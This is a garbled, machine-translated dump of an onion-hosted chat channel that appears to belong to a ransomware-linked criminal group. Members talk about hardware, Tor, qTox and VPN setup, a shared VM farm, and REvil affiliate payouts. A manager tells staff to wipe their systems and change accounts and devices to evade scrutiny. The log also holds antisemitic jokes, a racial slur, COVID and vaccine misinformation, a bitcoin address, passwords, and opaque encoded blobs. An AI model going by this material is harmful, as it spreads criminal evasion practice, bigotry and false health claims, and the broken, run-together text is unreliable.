](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Mom4EWudGdphApDW6) What's the deal with what? you can make 10 copies of Vasya Pupkin's qr-code there must be some protection against fools - usually there is some gamadrill, who would like to see a square of Malevich with broken pixels) and how will you reverse it? they are stupidly in the database and check http://www.youtube.com/watch?v=q1e7BWdbrbw well, for example, the reversal of devices is not clear how they check. 
but there are already devices that actually check that they all check, they check in the public services database?I am against all this crap, even against medicine, it is pure genocide, so why not pedal this thing here?..I mean all sorts of satellitesa it's understandable, it's all childish pranksvot and I say - orvi is not covidogo, flight of consciousness ... mine wants to factitiously, broadcast, sterilize, castrate, embalmed and mummify me) and all this is not her job ... we don't have such procedures) get high on their marijuana...(c) at least specify with what: heroin, desomorphine, satellite, solinu And seriously? who's been high?confused thoughts, remember youth, eternal happiness) the first signs like already)urgently faciniruyut)aha, with the words "Repetition is the mother of dementia" "not in your youth" already without _sorry_ ... not in your youth slips =):sweat_smile: "sorry, not there," in his youth with the girls, this phrase slips ...))) not there to write off)?)sorry, wrong place at 15 min I'm going to brew a stronger puerh..)
and jabens, and rocket) well dar_chat works?ping
more likely Most likely the mac was flooded and there was a short circuit, as the vid burned out in the concession now they are more friendly, the whole apple system ne, the mac is good, I sat on iMac for a couple of years sitin11 put)didn't like the system and how?i would rather touch it in the toilet than touch it and i don't know why i bought the mac as a cradle? i remember playing starcraft the second time, maybe the mac was good enough? and what can you do on the mac? i've been burned out on the mac, has the RAM burnt out on anyone? and the RAM can break? well, corsair micron is stamping it out. I have the RAM from them for 3 years now, without respite and ssd, plus on the operativku warranty from sitilinka caught lifelong) Lies 4 more boards of 16 gigas for the future) Micron inserts Asus in the budget notebooks. And micron turned out to be faster than the bought adataoksimikron? micron seems to be normal, hunix already xza as micron and hunixDa now Kioxia, just learned xxx bought likeToshiba like still doing? and does not samsung makes chips for all:Take corsair)And what's bad Intel? Chaimi XPG GAMMIX S11 Pro - TBW similar to Sams and the same 5 yearsI have two Plextor are M.2 I do not know if they are still on saleesams no longer the same)yes, I understand, it's beyond competition5 years warranty give and adataU sams TBW was the most normalSamsung on availability promise 150tbnee, I'm already broke my brain these vinoints at least Kingston?
all jerk on samsung but the price is wild, if we're talking about 980 Proshku, to PCI 4.0na adata yes not good, no other analogues?i don't know i'm not a fan of samsungsumsung ponts) my head is all broken between samsung 970 evo Plus 980 Pro or not to fuck around and take ADATA xpg 11 pro ?! guys but is it worth the trouble to choose csd nvme ?))) he also has a nickname Paul Derevyanko and he, fierce tester sofas !is not the one who works in furniture and checks the strength of sofas? thank you, a good toastmaster and his contests are interesting ):laughing: aha, for Angelo pour work Woodmanata want to take all the place alone there! HomeVideo? @elliott norm git, I poured almost 2 gbno terminal at least have worked so for a long timehow I no rekvestilnu and in the browser is The change you requested was rejected.ERROR torsocks[5019]: Connection timed ottiz terminal just do not understand what the error, from the browser 422 I opened normally, but the git still lying in the gap and I mean the same thing, what else is on the error@weldon You are using qTox version v1.17.4. Port 0, does not crash. udp/lan = off; ipv6 = ophosthost, now changed port to 0 - does not crash@xander crash because of the portana setup *qTOX* (ip/proxy/port) are in `C:\Users\user123\AppData\Roaming\tox` - for each profile separately - in the files *.db, *.ini and *.tox in encrypted form, to change proxy/port, I need to remove/rename profile1.db, profile1.ini (profile.tox leave), now after entering a password qTOX does not pop up, you can go and change settings@weldon well proxy it certainly knocks. Checked kst put socket 127.0.0.1 and port 0. 
After restarting it will not crash, it is not the proxy.@xander does not work[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=DCRABrrPeYvT8vpDe) Run with parameter .\qtox.exe -P NONE will disable the proxy in the registry look for@weldon you have the wind, I do not know how there, look ini file which lies long@rocco in the already created can be changed (settings are not available until you enter a pass, and if you enter - it closes .qtox.ini doesn't have any of these settingsFix port 9050Port=905050, how can qTox be connected to tor (tor.exe is running)? Proxy type = SOCKS5 Address = 127.0.0.1 port = 0 (did not change, maybe because it closes after restarting and entering a password)+ all geet - onyon not found? good morning + geet lying? excellent )@demetrius, if so, remove from the announcement riponly, maybe who wants to write something@all let the message hang, do not write anything@all Friends! I sincerely apologize for having to ignore your questions the last few days. About the Chief, Silver, salaries, and everything else. I was forced to because I simply had nothing to say to you. I was dragging my feet, screwing around with the salary as best I could, hoping that the Chief would show up and give us clarity on our next steps. But the chief is gone, and the situation around us is not getting any softer, and pulling the cat by the balls makes no sense anymore. We are in a difficult situation, with too much outside scrutiny of the firm, and the boss has apparently decided to lay low. There have been many leaks, post-New Year's Eve receptions, and many other circumstances that incline us all to take some time off and wait for the situation to settle down. The reserve money that had been set aside for emergencies and urgent needs of the team was not even enough to cover the last paycheck. There is no boss, no clarity and certainty about further matters, and no money either. 
We hope that the boss will appear and the company will continue to work, but in the meantime, on behalf of the company I apologize to all of you and ask for patience. All balances on wages will be paid, the only question is when. Now I will ask all of you to write to me in person: (ideally in the toadbox:)) - Up-to-date backup contact for communication (preferably register a fresh public toad that is not fried anywhere) - Briefly about your duties, projects, and the Japanese language (for coders). Who did what, literally in a nutshell. In the near future, we, with those teamleaders who have remained in line - will think how to restart all work processes, where to find money for payments on wages and with new strength to run all our work projects. As soon as there is any news about payments, reorganization and getting back to work - I will contact everyone. In the meantime, I have to ask all of you to take 2-3 months off. We will try to get back to work as soon as possible. From you all, please be concerned about your personal safety! Clean up the working systems, change your accounts on the forums, VPNs, if necessary, phones and PCs. Your security is first and foremost your responsibility! To yourself, to your loved ones and to the team too! I ask you not to break up my personal contacts with questions about the chief - I will not tell anyone anything new, because I simply do not know. Once again, I apologize Friends, myself is not thrilled with all these events, we will try to somehow fix the situation. Those who do not want to move with us on - we naturally understand. Those who will wait - 2-3 months rest, engaged in personal life and enjoy the freedom :) All working rockets and internal toadstools will soon be disconnected, further communication is only by backup toadstools. Peace, everyone! Jewish: - Isn't anyone going to ask Aunt Basia how she's doing? - So how are you, Aunt Basia? - Oh, Moyshe, don't ask... 
A Jewish boy walks up to his parents and says: - "I want to be Russian. And his parents reply: - If you want to be Russian, I'm going to the corner and you're going to stand there all day without food. Half a day goes by and his parents ask: - How do you live as a Russian? And the boy answers: - I've been a Russian for only two hours, and I already hate you Jews! A Tatar was born and a Jew cried :joy:it is enough to be born the Jew, and you count a member of a secret society and prevent russians from living, how it is a pity that I am not a Jew, not a Jew, and a liquid favorite blazelensky - you are russophobes, Brotizhimn ukrainy will play on VVP's nerves) so he will play with his dick on the piano, it would be better if he played with his dick on the piano, such a joke would not be appreciated by the aparthotel and it was not the palace, so the palace will be zelensky's palace soon, they are already going to Georgia, through Krasnodar what do the Ukrainians have there? Have they taken over Rostov yet? It's quiet here. Now it's normal + cooing. (Wow! I detected that you have 24 CPUs. I will not autodetect any more than 16, though. If you want to configure more, set NumCPUs in your toggleSquawking does the toad lie or not? )[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=d66ydvhY7Qc28J9wo) right? 
https://www.youtube.com/watch?v=41deLpbTcaw So is my toad lying in the morning @all I'm saved in the steppe, I'm on a dashing horse, who's not there, who's there, who's not there?@all stop sleeping all
reruns
otr to all of Gator's neurons !@all proxmox keeps working) yes, it's hard to understand how to make messages here, it can show antique times but hide the latest, and you think "what?", but the date is old, it won't be ok. I have lost sound in the chat, notification the farm, we are testing with gatortaki can operate the farm?
i took your old message as a new one at the expense of vm)) something i have a chat in the middle of loaded :zany_face:yes, i see the machines are working there@hammer already sort of pro-apgreydilita same ovada will not izomen, well, this question google 5 mines further image will be used here on the Virtualbox what is the difference in them?as i understand get iso image instead of ovaPreport to OCl you can select Include ISO image filesTemperature LED 70-80 degrees) @jaime good stuff, but there should be a pink glow. I have a samosadTurn off all your cars, after who will stay with the rights himself will turn off all the proxmox, as it should not suddenly@mitzi and counting down to sleep will the farm machines? @jaime soon New Year - need different "lights")) I have a lamp for seedlings blue light, there are a lot of multi-colored diodes. Suitable? I'll tell you more, you need a different spectrum ... And knows the technology), and found out who grows) may be under quartz? need another grow) under UV lamps) AMD Epic is much more humane than Xeon (at least for mining))[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=zt4ZtPo3oBP3r7zDQ) Something costs a little bit too much:grinning:but they do not give anyone, not even me))) funny farm )Mitzi grows marijuana bushes, Dimetrius grows coca leaves and gator trying to synthesize ecstasy there are many pitfallsTomas we grow it), I did not give@mitzi I see, listen, but really build a server, say 2 processor EPIC + 128/256 RAM and rent in the arena on the net?What, you don't have enough RAM for 128 gig? And how much will it be now? DDR4 ECC there increase the RAM, but there should be one more slot to add the processor, too) I Hammer, Sledge Hammer )@mitzi increase that?) or the quality is different? ESS tamobedit that not long before how long? @all Clarified on the upgrade of the RAM on the farm proxmox, work is planned after 18-00 Moscow, the farm will be shut down. 
2 3 ``against three reverse apostrophes? one ``two ``three `` TEXT one ` two ` three ` at the beginning three and at the end trichet doesn't work, and without vars similarly `vars:` ` nodes: 2 `` `- include: vpnout.yml `- include: vpnin.yml` Is it every one? It seems that quotes with any number of lines can be restricted to ``lala``https://docs.ansible.com/ansible/latest/user_guide/playbooks_variables.html``there every `` line needs to be `. with ` apostrophes. )Here every line should be `apostrophesIt seems, I closed it with reversed apostrophes, but it still does not help.I understand)Yes I have an editor, it's chat formatting eats up.A well if so, then I unfortunately can not helpEtoby, I am aware. There above in front of nodes: 2 two spaces may be better to use any online editor? There put a space or indentation - all broke nahreknna as I remember, yml files are cranky to formattingFu shit, wrong chat, sorry. Chet how not define, still says the first - includerocco do not tell? nodes: 2 - include: vpnout.yml - include: vpnin.yml`It doesn`t work like this, it fails:Ansible question: How do I define a variable in the head YAML-file? @all Hello all, for those who use proxmox VMs, today I plan to upgrade RAM, which I will inform you about additionally please close all unused VMs, otherwise there will be a risk of losing info after farm shutdown.:vulcan:goodbye to all vindas (it's the new tor, ahaYour tab just crashed. We can help! Select Restore this tab to reload the page. )all this istoria :)https://carding.pro/ru/v-rossii-nachali-blokirovat-brauzer-tor/https://carding.pro/ru/sotni-uzlov-tor-ispolzuyutsya-dlya-deanona-polzovatelej/xanderthx+thesetjabber up! where is even one admin? huGhurD toad=) i'm in a fixD @neville crypt waiting, answer:D@neville drunk or what? give the word but will they approve over? i cancorrche you tomozavy i teary-oh return me my 2004th however is it sad? 
- no, it's sad) no toad, i'll go pee in the piss, i can do everything, thanks to the toad, who's the toad with the docks?) hash@ does anyone know? toxe messages only come online, mattermost is a good alternative, they're developing nowThe last I heard, tox is bad with group chatsThere can be group chats?i think they were planning on switching to tox... what do you think about that by the way?fuckin mastday))) funny I had 20 gigs gobbled up somehow shorter, there's a memory leakageThanks for the advice, I'll try to restart it if the problem appears whole two there is such a process in the details section in the taskmanager videnschya look in hacker taskmanager also kinda process hacker and process explorer viden restart it through the process explorer it does not show up anywhere?I had this@homer in dwm.exe memory leaksnu and plus otr in this version of rocket requires confirmation of the start of a private (encrypted) conversation from a contact.
this is - yes, not convenient otr does not work simultaneously with e2e, pay attention to this. The green key is e2e enabled, if you activate otr in the conversation, the messages will not come.If it doesn't help, i'll fuckin' tear it down and put some Centos on it and i'll talk to it by spesh, i just forgot about it, i get it, i'll look at it in 2 days :) look at the resource monitor, there's no virtuals on this system, is there only wine 10 and torna?I have now put the latest updates on the Windows, maybe this problem will go away I wonder if anyone has had similar? i have a separate system on which runs tor (bundle or whatever it is called) (well, it's like my proxy), this servo under wind 10, except for torah there nihren anything in the process of working this servo gobbles the hell out of RAM, under the user under which runs torus gobbles 200-300 MB RAM, but in fact over time will eat up all the fuck up to the inability to connect on the rdp and reboot only through the button, in the task manager does not such processes that gobble up fucking memory, there max ~120mb at the most voracious process, but the task manager itself shows that osu consumed by 99%, all osu 8 gbyes) well, he and the general) well, except this channel) of courseThe data in the database of chat stored encrypted?But I'm used to it)) there is such a thing. I have about once every three days 1-2 errors. And so, almost with all communicate through the OTRNo it's rare and confirmation of apr just strange ... (that wrote, who wrote, whether he wrote in general or it's all an anomaly, it's another mystery of the universe not often, but sometimes see the counter that there is a message from a contact in a private, and there is nothing)Demeter, well my experience of using otr here very deplorable, constantly flies off otr...I blame the torus itself, but once every couple of days@alik how often, just honestly, OPP do not come or give an error? Installed locally, all encrypted. 
In rocket chat, messages disappear or do not come to him@mitzi blab in ls> Mars -- this vpn dual-ratisk neither this nor that -- this is our internal officeSupported! I will exclusively praise! I refuse to cocksuck) Understand brodonado understand and forgiveI hope everything will be tomorrow Hello! Salary a little delayed through my fault :) My bad, you can blow me away all the chat :stuck_out_tongue_closed_eyes:yeah, thanks https://play.google.com/store/apps/details?id=dev.darwinsoft.marsvpn this one? Or this one? https://apps.apple.I have added money beforehand, but it didn't work, so I had to press the renew button and it didn't last, although I checked the checkboxes in the panel works mars Have you heard of the HackTown forum?More specifically.
they lowered the pandemic threshold to 1% (if i remember the numbers correctly) that's the point (for a pandemic you needed at least 5% of the population to get sick, and it was only about 1% they fudged and redefined the term "pandemic" itself before the "pandemic" itself, to pull the owl over the globe to impose the term, it looked very strange that year, when the WHO began to use the term "pandemic"-that's for "cattle" bullshit-the epidemic threshold is not exceeded, according to Rospotrebnadzor itself, so there is actually no "pandemic", according to the classification of infectious diseases....and they blew up a "pandemic" like crazy. The coronavirus has less than 1% mortality, and the mortality rate was about 50%. Although they bought vaccines in commercial quantities back then. So they didn't get vaccinated. Doctors quickly diagnosed it and suppressed it with antibiotics, azithromycin. By the way, there was an epidemic of swine flu in 2009, but in fact it was the pneumonic plague.Cheto interesting) look at the trailer on youtubey today will watch "compartment number 6" happy end - this is our movie, 8 episodes, half an hour + "movie about the movie," I still watched 3 series in the spring - when I bought a TV wink free was, Recently, the remaining 5 finished watching (wink free again)I found some frenchwhat's the name)neapoznite very interesting movie - about a hacker-programmer and novice porn actress)Maybe finally the markets will start to take bitcoins, with the same qr codes) good morning 
revolutionaries)
$binary":"5axbEzPkwTX1eWc+jyb3Ry7U4Cf/t66IMh1ideIvab60uhhRvz2UAb39KtKyLWIzXoWq4JXkUjOEbQsoI1bitP5PW4AOMvH589zULgCxSIwiBeXchIx8Fj6Jt79lznW4UqnbwesCFsggylEqZI0Y/XWlu2Z3mBzhgIl1wranNONo7D1QVNhZAFDtnUGnTaeG1XQKQP8GWh+6NIsf2/BkZdmOW4BSp9WPN1UVEaOrblvsVpjlK3HBDdjPHDM2nMZoqSxA/KiGaCqP"}{"$binary":"FimaYoOV/avxE9eZKdV2CyYuqiu6U76eThc4WQZ9XRspT3+uOruvwtCuHxLGnLorTbmpJhat9bZk/syp1ZmCrFMqcwgbD8Gg1hqhKptjrK7KLgViSMsOeZm74J/fMJcOGlSuJMJ18vjR8FkdYjlXzDB8e8mOydLZ6nNu/ROJRxed2BOJuipheFrbhwaG4fYoz12zCW66Il0YCMJVauIniY="}{"$binary""X98ZwKBCfqD7+P6mZhyd1FSUHRl0xXf2MBxpUp9YlFnFfYnE6Hdbp6BZB/NfegouTKux19vIUxPIHEqzX+g2jTRhYLj49j1wJesPAB5Z6KpHEMAU/XDX+NkuZYTkrTlQOhrAXNZv/CfqceB/zdnoFsXcL3idE8wdYEO0e5y/OtX7L0M74UzBm2eHcwEAShePoe/DD0WfxB5lBEdYBKVfCD/ziVGI="}{"$binary""BhyYeie6gfjaciJboFTqCqMnNWW8TYK3BV4RQMGxnGZE79YmHCwvhZnZ7gNdOQtNy+08Nm+yScMZ7joT6t9CWuZ5Dq1yzjoYV4lvA5zH2PYTilRsfPbsZ9EGaEZDLcbvJ6RTlIzBeRmty7F/HzQtNrkROG8dpYWrxFdApkSLrWPjRzUJLd1E94XpgSCpHC6yC4+RFzW7HaJBZGMcIVvhjyDVgsmyfC9gkLgEy0LorCMeLRnKaScbSvKWlqp7e0+MLj9VSeNNjrHeJ4/HBrZ2bApSUnCx8laImc0lcodwcg=="}{"$binary":"BGhlF5xawGsRccWq4Y+ZJ0I7cHAyY7R/nWlDDN98wODuzOozu7Gjg277mqC+HxbE7Q/qehczkSTzSgTPgO60giJWUmbi+oS0h/y/J3iyKuqcSTVHH23tUO8qUZVkw99SeSHlilvTf1uOZLCM0jzb+H7D/fwcO3KEWqqwPK1r2/EOYv+EQYCkKlKhjxhMElz/Elrg6gb5mJT36p09aU6+pV0jy3eRRC6X"}{"$binary":"dT9hQWx8sXDRNnFK1ukoOaJAR+kxW8LEjlI+yagMIFBGHlFy+Rp9qYDNWr7PT/vog2RFrt2MSAB12CQXF2+PQn5ylKQROzqjNZxGV3A6mjG3zowroyEoIxIlC+Y2a2Ne3fwUfxld2P58lnFdRqizmqP+A12W3+klUX6EVG9KJr3ipqzzjxkUX4mRXc+qGu5qhdsxuiX8c02gbnys+qd9j7TUsGJb8el8T1xw2ITvIvhr9JBFWUdKduVIhUvfPmlAOX0="}{"$binary":"TvUllSwRGm8ssFTqqNJY32hZDm6NN/Jh60SzyW+4whzLJwjNaCN0pLAZYYDnR35VuiGTxpBi8zXMhLyf4oKwXblDjrcYLtAu3RXmlCRQhlzUVrAigTDoRsThfUFRPB6XffuGfigBD3xYVYA79bYLtwZEojGHIEN8QbTNK3KJFhjgO19aBuGROBxAhmBIyNPZGFgHpGIzTUVrPeKEB8zZefPQIjlFTDaake2zJ0qudHxntIs="}{"$binary":"ANowxdH4+Fs4beL5YVAJrQsBft2s3vN8l+uz2Q0qKZeBawCmL48X+O6GwqJ78XCTK860oynI7fxBL+eYbQ8B0uyObgHzCqF9vXT997TqKhk77sWT+4UjTSNK1zWXMKuvwHye7k6G6Xya8vFG2/b10XZMt1bnZt813A13dD
M/p6MDZIbds5D3T69yiYikgAArHlevxBo+zidyafpgqvvNHrGutInjLldAm4ysLQ=="}{"$binary":"4750XJwReDo+a1ILUl4MdQSltZW2czUk3AypKn937zRHDTM3afHuNynWM2cMutbpCslbjqaQR/QZNyQ2l1GCUNgLT2cLu/84t8a6nfJ+VJ/5l9RnY5JfZsxUjuGxNMmpcPZMM9mStYb3Y72wtaoPDYRzfZZRFYy0P7Si7MY9b5+++lrIUyacjY0AygssFVT5aRtYffY7rheQRIpqlqd1Fbpb1KZPz3J1aso7qs1EgPn2JHT9O22S43wnOOihRioxvZP+CEhiL+2Y"}{"$binary":"Z2wSt1cSxCf+qDAZLm9JaXXf3cq1ysnNgU/k0kep/2gRVM8LfPjMuiODU8560sNTNUYWXRM7ypJJpHUjZHg1SzRTC6z/YhuWb++UMMhz3Mc4bNArFZAZRZzkeVPir8PIMLmQUtMMmhS5199xFy9nK/2lO9g2wiqAv71I+6nzK9qji60CaXuLdW19j2N1GehlIEqFhcBmMHIfwcyHAMULT/M3vAOcsxQNMbGrJqx6ZcfJBQQlQtTyhPlcgYWLPSupVWisY7uINs1yBGJUyeL2pRYDDqYQwIflMy+RIx2ZH+cKyJLtn/ESzkK6TC9oz8mD/kXbT4QHYNgnyVM0DNQVldA19P9ccpATrA1jh/n4eQRBhI1aZvm74pzwAaW7QrWncjU9Ma5Uep1mxor3I+9PdMjr4YtxrYuedhkL"}{"$binary":"++XWSeT4LV3GRI1rlhENQqPIHbIj/3hlflUtdysWosu0/0w+7JEmXUQhLz8RTJyQFYG9ztHBVPYKvHZlzv2oUmsjK+sYE2AUQ8i2heFVvSSME9jYBQssf9eXqT0VF0tqAXdjwvRQpWkAoUOpgT2tVzMYToCIUIYt2MGzJWnei6Npq6jXiaI2yPHhJHG+/gsTDI44bUoVPpVVktav55QppYToq7DYxwXwhMCejNFlfQ=="}{"$binary":"9K3UbpWrv5mU2e8HmD+UYLJnYGTxjpQ5AHO/fVHDvdXMU1cIzJQ3mRIQyrLHJhCJGCZ6l+edya0dFuzlL4wTUNysJNkOZDTeYwgyBxL5l9W2TOgpk0jG9Cv8V2B96UuoVxLK3qRzzY6ZNXFcZiOCqw4UQn9kWShpjQsUiQkOHSN+0ukGHJW/7scvTMMnjZ/cG+Bl8krJix3fICz0qQZ82EB5rANYXc+N4g=="}otrmaaaaaaaaaaaaaaanтак TEST_DIRS += ["jsapi-tests", "tests", "gdb"] in second case there is an outside condition, thank you or how is it that spaces are broken only at the beginning of the condition should not be python sensitive to the number of spaces? i.e. there is a condition inside of it, if you move the assignment with whitespace will it have any effect? i only know a little about python? yes i remember) ok, if anything knock if it appears, then you will need it not yet. man missing a schodan not needed in the end?I know the last v2. recently switched to v3. 
as usual by the law of meanness if you know write me too pliesparu months ago was alive, but I can not find tor3 link(( only the last link has@all verified alive? if anyone has the current forum address, do you have it? in your personal info if you know itAloha ! hello there ! It is controlled thermonuclear fusion. Soon they will sell it on Ali... A nuclear power plant is for what? It is a super nuclear power plant right out of china and a gay guy's ass from europe to warm what to do? boil water on it and overclock the turbines of generators...) the only thing left is to tame the sun, it is able to fly... of course it has too much energy and it maintains all this heat with some Chinese miracle... the main thing is not to trap the rest of the globe if something goes wrong)now what to do with it is left to be decided. for humane executions, we can use it already... hell, nothing, not even smoke@Garfield heh, this is the land of the rising sun - china, not japan `https://infosmi.net/society/276375-v-kitae-zapustili-iskusstvennoe-solntse/` 70 million degrees Celsius is a tantrum:sun_with_face:``he is not our demon ``demons, in a word``. they say tsar, not the real one ```` won't let us sing such songs about the tsar ``who dared? who? there's already shielding all connections, like from a lead dome...better connection with the cosmos...one already zeroed in us everything is zeroed periodically, ways and scales only different "exceptions" seems to want to do a total reset...catch the bug !!!!i'm going to drink tea before it's acknowledged as a bug from above and fixed0nly until someone gets fucked up from outside that everything goes in a cycle, you'll be happy, you can live forever you can come up with 0day who will write a couple of dlls in kernels no time Don't break the world, it already has plenty of bugs...there's plenty to suggest, even here - we were trained to think that time flows only in the way we can understand it without catching a "blue screen". 
time is also a part of matrix, if it comes to that, and about this module I have thought up there will be no collective mind - there is such a notion, like up to the last buckupadak there will be a rollback so its memory should be scattered over other "modules"... on all, Mr. Smith succeeded in that other matrix, but something went wrong to understand how at that to save another memory) yesterday I was reviewing the film "Mandela effect", though not for the first time and here I really came to the idea yesterday If we all live in a matrix, from time to time we upload updates and synchronize. really can reset the system to factory settings) full download) Estonian piiiiinggg me roskomnadhor slowedTe he wrote 55 minutes ago. and you just came? why did you say about the rocket, it immediately fell here ``Now they will beat him, maybe even kick him`` ))), `I, dear, you will be injured now...``Then Dima will come angry and say: and that's it, Rocket is dead, we break the counter messages malfunctioned? post with a dog edited, missed first (Weldon, Angie) Eng not you)) I can not avoid quoting the phrase "work, and Vona pratsue.I'm ready to listen to you his whole biography...I thought he put it all down, but he's not...Comrades, we're talking here, but it's all down there! @Garfield - "I don't think, I dream. There's no harm in dreaming. Then I'm not doing anything harmful." :grin:A profound thought, but so empty...reading Cat, something reminded of Down House )`No, I do not like pills. I choke on them. I'm more into fish farming. So I don't need drugs at all. I see life as picturesque without them. I have a reference too. The president clown had even sharper catchphrases than the mayor boxer) And today not everyone can look into tomorrow. Or rather, not only everyone can watch, few can do itKot I do not understand your speech :woozy_face:In the original, bye kat, bye lena.Trolling from the street we are just being sociable :pleading_face:bye kai. 
Bye Lena, there's only one Troll)You're like two Troll brothers )we're like trolls at a time by the wayIf Kai hadn't joined the chat I would have known that "The Snow Queen" story would've started off that way: Story One. The Mirror and its Shards Trolls Carrying a Mirror.... by Gerda)Hi @kai !kai "Button, Button" is how the title was framed by the author. Sounds different even - from elation to despair movie "premise", the story "button, button" )) you can even review, probably. at the time it seemed quite at the levelIn fact, awesome! I need to review DMB, the world movie) as gophers in the steppes :grin:Everywhere and!yep, you can not see it, but it is there)) all the time)) the big brother is watching here too)) keep working, I'm watching)) yes everything already, toad the fuck you work for me )))) and fuck it then, work so everyone who is online at this time, i can't get into the network except you or just wait for a breakthrough)) i sometimes have no connection because of a wpn, no rebooting helps, but i switch to another config and it works, i can't get into the network in any way, the wpn works for everyone or only for me?:man_facepalming:TAM NOT ME? If you do not need it - roll back vm)@all Call back, whose vm on the farm WIN-EBG5OFV6S4Q (Windows 10 Server x64) ?Thanks ask adam of course[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=wTPminvHdTfvaJRWq) and I get the git?I'm there waiting for the wrong chat room, have you already given me the rocket lag...(I somehow only launched it for the third time) git works fine? Sooner or later the voting around the world will move to online. This opinion was expressed in an exclusive interview with RT by Dmitry Medvedev, deputy chairman of the Russian Security Council and chairman of the United Russia party. 
Commenting on the topic of interference in the elections, he noted that "digital giants are fed up with everyone, including the United States," and said that *Russia should have tools to influence foreign digital platforms.* Medvedev also answered a question about political competition in Russia and said what he thinks about Trump blocking the leadership of Western social networks. return Trump ?)well shit...)(picture with a sly nigger.jpg)to read mail! dudes, think about it, why would someone start a mail service? polichinelle secret).sorry, forgot the source, proton - hanypot anb....you can jerk off at the end of the day...fuck, you can drink...it's cold...the weather sucks...why is everyone so sour?! @kermit thanks native @angelo``` in Russian. https://www.securitylab.ru/news/524997.php ?@kventin ?I think it's martin@all Folks, we have a cool web designer. What's his nickname? I think they're trying to be divisive. They act like typical ru affiliates. what affiliates with traffic shaving, what affiliates with lockers "shaving" and the ability to cut 70%) in my opinion it's a split attempt, given the very large payments do not think that they have problems with money to shit in their karmamozhet is internal rats and not the revilacher policy se rats maybe so they merged and nowhere to complain, so was not it is unclear, i.e. ends in water.i.e. ends in water )[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=duYqtiJTKPtDoqhGh) as far as I know, they deleted these threads when they were banned on the forums but they were not charged for payments and found a backdoor, I do not understand, are they accused of real cases of non-payment, which is fixed on the forum, or found a backdoor that allowed to do so?How can you tell the essence of it in three words? I heard that Lockbit did not pay out to anybody there. 
https://threatpost.com/revil-affiliates-leadership-cheated-ransom-payments/174972/ ``kek@all ``` https://threatpost.com/how-revil-may-have-ripped-off-its-own-affiliates/174887/ ``laterdayprivet not yet btz workkosh bc1qjy9v4kuuj6n80r0gtqsdp4eva0aye279k278mf the password to the archive itself grdFDHL:":kv report: Download: https://qaz.im/load/BEAGNr/yH9E4K Delete: https://qaz.im/index.php?a=delete&q=832830891 Password: E6hndDieSn6iy7BAfsN3HBiz9K4AfDRNy34BsaG8rBfK I ran out of work bitsgood morning )She calms me down )It's not even Friday, and you're already on the Linda?) mom, mom, marijuana, you better not touch it without it! )ok, put the crutch to smoke is definitely harmful)in the 21st century vinda made fixing application windows on top of others ? or should i put a crutch ?[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=mSz8psrWXs2dssFwJ) thank yous@all the toad is up and the toad got scared of tox competition and came to life and look where go your vicitpette under root call netstat -lpt under root see it? netstat on what interface listening port shows? https://golangcode.com/serve-static-assets-using-the-mux-router/там all convenient and nice and in general write via mux look on what ip hangsblexknid help anybody lift the site in torus on go? `package main import ( "fmt" "net/http" ) func index(w http.ResponseWriter, r *http.Request) { http.ServeFile(w, r, "onion/index.html") } func main() { fmt.Println("Server is listening ...") http.HandleFunc("/", index) http.ListenAndServe(":8001", nil) }` this all works, but the tor browser can't see it Knock on the toad (in the profile), plzaga, the toad has wings attached) then they will say Angelo pizdyajaye, then calm down, everyone has a toad fallen ?welcome backgeraldoHi all. 
I'm back.=(kvetininthat's what chaotic sex leads to(((rocket has frequent disconnectionsrepetition - the mother of learning - the toad has fallen offno he asked me out,i confirmed yesterday he was.It's been 3 weeks....He must have been on vacation,for 2 weeks i think he was going toWho knows where @elroy is now ?By the way,you can set different sounds for each room or turn them off. - very handy@brainwalkerscommon:laughing:thank you@ allen without a spaceHello all. How do I specify specifically who the message is for? (Example: `need to call red` by angelo at 9:59 AM)so it fails because there is encryption. and it does not work correctly with another time-browser does fail on the time mismatch, but it is solvable..I checked from the background)I thought this feature too old thanks Bennyvotes and answer, Proxifier can be used in the eternal trial, date/time change here rolled ..) my internal pirate won) suggest an analogue of Proxifier for winduf, need to "proxy" prog that do not have their own properties to change the type of connection? like proxychains, but for the winnda ... 
guys who has monero kosh on the winnda?chromium now is not the best there is such an asshole, of course, all clean check, yes:fingers_crossed:you will do fine, we believe in you only femalevote as I will do antik - will work through the pisu:grinthis is clearada everything works through the asshole like everywhere else in generalfree dolphin there are constant crashes, you need a new antivirus, cracked variant does not work there glues everywheredolhin anty a normal antivirus to 5 profiles for freealuchis easier to take aws and raise wireguard one line in the blacklistaghad a hole in his friends that they downloaded from torent, and there dick, check it there all poblocheny, uzuchit only for cuz what so yesseed4 is not a vpn, and shlaksmenil vpn and norm, seed4/me weirdlane now I figured out not solving the problem, but was sure and checked everything was clean before changing vpn (do not understand your problem, why not try this?head from antikA if it constantly asks for cookies when you enter the same site, it means they are erased?Makin, just open a private window and work there) VELDOOON) kicking Veldon that he rather finished antic) sat sieden on the North and it was all good news, the questionantidetect browsers seem to solve, but they cost money on the services themselves google - you spalat at any on cookies that I do not know as with this now, it should be verifiedtipa it even invented and the background here is not so after that, with about a month or two ago google put a big face on it and said it was tired of tracking us and refuses to cross-site cookies in chrome in the FF they used to block cross-site cookiesGhostster plugin also dumbass.through these scripts are leaking and tracking - google knows your movements over the network thoroughly, due to the scale of the coverage of the owners of sites convenientproblem is that google analytics scripts on almost every site, especially cookies googlyne nizkom through the settings, the browser is able to 
